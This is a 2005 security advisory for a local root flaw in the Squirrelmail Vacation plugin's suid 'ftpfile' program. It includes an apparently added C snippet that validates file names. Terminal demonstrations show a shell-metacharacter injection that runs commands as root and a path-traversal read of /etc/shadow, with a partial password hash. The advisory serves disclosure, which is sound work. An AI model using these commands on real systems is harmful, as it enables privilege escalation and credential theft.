LSS Security Advisory #LSS-2005-01-03
http://security.lss.hr
---
Title              : Squirrelmail vacation v0.15 local root exploit
Advisory ID        : LSS-2005-01-03
Date               : 10.01.2005.
Advisory URL       : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact             : Privilege escalation and arbitrary file read
Risk level         : High
Vulnerability type : Local
Vendors contacted  : No response from vendor
---

===[ Overview

The Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply message for incoming email, commonly used to notify the sender of the recipient's absence. The plugin relies on the Vacation program to do this.

The plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz

===[ Vulnerability

The Squirrelmail Vacation plugin ships a suid root program, 'ftpfile', which is used to access local files in the user's home directory. ftpfile contains both a privilege escalation and an arbitrary file read vulnerability.

Command line arguments are passed to the execve() function without being checked for shell meta-characters, which makes it possible to execute commands as root:

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$

It is also possible to read restricted files (such as /etc/shadow), since ftpfile copies a file from the user's home directory to any other directory without checking the file name for directory traversal:

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow
[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$

===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.

===[ Fix

Not available yet.
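Although no vendor fix is available, the two checks the advisory describes as missing are straightforward to express. The following is an added example (hypothetical code, not from the vacation plugin or ftpfile) of how a setuid helper could validate a caller-supplied file name before acting on it: it rejects shell meta-characters and path components, then uses realpath() to confirm the resolved target still lies under the user's home directory, so neither "LSS-Security;id" nor "../../../../etc/shadow" is ever accepted.

```c
/* Added example (hypothetical), not code from the advisory or the vacation
 * plugin: checks a setuid helper needs before touching a caller-named file. */
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Characters a POSIX shell treats specially; any one disqualifies the name. */
static const char SHELL_META[] = ";|&$`\"'\\<>()*?[]{}~ \t\n";

/* Return 0 if NAME is a safe single path component, -1 otherwise. */
int validate_name(const char *name)
{
    if (name == NULL || *name == '\0' || strlen(name) > 255)
        return -1;
    if (strchr(name, '/') != NULL)          /* no directory separators */
        return -1;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return -1;
    if (strpbrk(name, SHELL_META) != NULL)  /* shell meta-characters */
        return -1;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        if (*p < 0x20 || *p == 0x7f)        /* control characters */
            return -1;
    return 0;
}

/* Resolve HOME/NAME and confirm the canonical path still lies under HOME, so a
 * symlink inside the home directory cannot point outside it. Assumes HOME is
 * not "/". Returns 0 and fills OUT on success, -1 otherwise. */
int resolve_in_home(const char *home, const char *name, char *out, size_t outlen)
{
    char home_real[PATH_MAX], joined[PATH_MAX], target[PATH_MAX];
    size_t hlen;
    if (validate_name(name) != 0 || realpath(home, home_real) == NULL)
        return -1;
    if (snprintf(joined, sizeof joined, "%s/%s", home_real, name) >= (int)sizeof joined)
        return -1;
    if (realpath(joined, target) == NULL)   /* target must already exist */
        return -1;
    hlen = strlen(home_real);
    if (strncmp(target, home_real, hlen) != 0 || target[hlen] != '/')
        return -1;
    if (strlen(target) >= outlen)
        return -1;
    strcpy(out, target);
    return 0;
}
```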
===[ PoC Exploit

http://security.lss.hr/exploits/

===[ Credits

Credit for this vulnerability goes to Leon Juranic.

===[ LSS Security Contact

LSS Security Team,
WWW    : http://security.lss.hr
E-mail : security@LSS.hr
Tel    : +385 1 6129 775